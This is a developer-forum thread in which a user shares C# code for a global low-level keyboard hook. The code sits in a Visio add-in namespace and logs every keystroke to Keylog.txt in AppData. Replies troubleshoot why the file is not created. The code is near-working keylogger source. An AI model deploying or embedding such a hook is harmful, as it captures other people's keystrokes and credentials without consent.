How should I record the Keyboard pressed keys in a TXT file?
I'm an enthusiastic programmer. I found out this syntax about LowLevlKeyboard to record the process of the keyboard inputs and pressed keys. I don't think I set up the hook correctly to write into a TXT to record all inputs taken from the keyboard.
namespace VisioAddIn1
{
    public partial class ThisAddIn
    {
        private void ThisAddIn_Startup(object sender, EventArgs e)
        {
        }

        public partial class KeyloggerForm : Form
        {
            private static IntPtr hookId = IntPtr.Zero;
            private static readonly string logFilePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData), "Keylog.txt");
            private readonly LowLevelKeyboardProc keyboardProcess;

            private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);

            [DllImport("user32.dll")]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

            [DllImport("user32.dll")]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);

            [DllImport("user32.dll")]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

            [DllImport("kernel32.dll")]
            private static extern IntPtr GetModuleHandle(string lpModuleName);

            public KeyloggerForm()
            {
                InitializeComponent();
                EnsureLogFileExists();
                keyboardProcess = HookCallback;
                hookId = SetHook(keyboardProcess);
            }

            private void EnsureLogFileExists()
            {
                try
                {
                    if (!File.Exists(logFilePath))
                    {
                        using (FileStream fs = File.Create(logFilePath)) { }
                    }
                }
                catch (Exception ex)
                {
                    Debug.WriteLine($"Error creating log file: {ex.Message}");
                }
            }

            private static IntPtr SetHook(LowLevelKeyboardProc proc)
            {
                try
                {
                    using (Process curProcess = Process.GetCurrentProcess())
                    using (ProcessModule curModule = curProcess.MainModule)
                    {
                        IntPtr hook = SetWindowsHookEx(13, proc, curModule.BaseAddress, 0);
                        if (hook == IntPtr.Zero)
                        {
                            int errorCode = Marshal.GetLastWin32Error();
                            Debug.WriteLine($"Failed to install keyboard hook. Error Code: {errorCode}");
                        }
                        return hook;
                    }
                }
                catch (Exception ex)
                {
                    Debug.WriteLine($"Error setting hook: {ex.Message}");
                    return IntPtr.Zero;
                }
            }

            private IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
            {
                if (nCode >= 0 && (wParam == (IntPtr)KeyHelper.WM_KEYDOWN || wParam == (IntPtr)KeyHelper.WM_SYSKEYDOWN))
                {
                    KBDLLHOOKSTRUCT kbdStruct = Marshal.PtrToStructure<KBDLLHOOKSTRUCT>(lParam);
                    Keys key = (Keys)kbdStruct.vkCode;

                    try
                    {
                        File.AppendAllText(logFilePath, $"{DateTime.Now}: {key}{Environment.NewLine}");
                    }
                    catch (Exception ex)
                    {
                        Debug.WriteLine($"Error logging key: {ex.Message}");
                    }
                }
                return CallNextHookEx(hookId, nCode, wParam, lParam);
            }

            private class KeyHelper
            {
                public const int WM_KEYDOWN = 0x100;
                public const int WM_KEYUP = 0x101;
                public const int WM_SYSKEYDOWN = 0x104;
                public const int WM_SYSKEYUP = 0x105;
            }

            [StructLayout(LayoutKind.Sequential)]
            private struct KBDLLHOOKSTRUCT
            {
                public uint vkCode; // Virtual key code
                public uint scanCode; // Hardware scan code
                public uint flags; // Extended key flags
                public uint time; // Time stamp for the event
                public IntPtr dwExtraInfo; // Additional info
            }

            protected override void OnFormClosed(FormClosedEventArgs e)
            {
                UnhookWindowsHookEx(hookId);
                base.OnFormClosed(e);
            }

            [STAThread]
            static void Main()
            {
                Application.EnableVisualStyles();
                Application.SetCompatibleTextRenderingDefault(false);
                Application.Run(new KeyloggerForm());
            }
        }
    }
}

I've made a mistake where I should added the
[DllImport("user32.dll")]
            private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

            [DllImport("user32.dll")]
            private static extern bool UnhookWindowsHookEx(IntPtr hhk);

            [DllImport("user32.dll")]
            private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

            [DllImport("kernel32.dll")]
            private static extern IntPtr GetModuleHandle(string lpModuleName);

and that is why I think the hook is improperly managed and can't write the keylogger data in
private void EnsureLogFileExists()
{
    try
    {
        if (!File.Exists(logFilePath))
        {
            using (FileStream fs = File.Create(logFilePath)) { }
        }
    }
    catch (Exception ex)
    {
        Debug.WriteLine($"Error creating log file: {ex.Message}");
    }
}

The (logFilePath) is the variable where I keep the keylogs in the Keylog.txt. But whenever I run the code in Visual Studio it doesn't create and such file. What is the solution?

So your problem is with the EnsureLogFileExists method? This has nothing to do with the keyboard hook.

How should I take the hook to the EnsureLogFileExists?

"I found out this syntax about LowLevlKeyboard" forget you heard about it. It causes huge message blocking issues if not done correctly, and can lock your whole system up, and very difficult to debug. There are much better methods to do this, for example Raw Input https://learn.microsoft.com/en-us/windows/win32/inputdev/about-raw-input

From the docs on AppendAllText(): "Appends the specified string to the file, creating the file if it does not already exist." You don't need EnsureLogFileExists(). Most likely it's a weird interaction between Visual Studio and the low level hook. Sometimes you have to run the .EXE directly to get it to work properly.
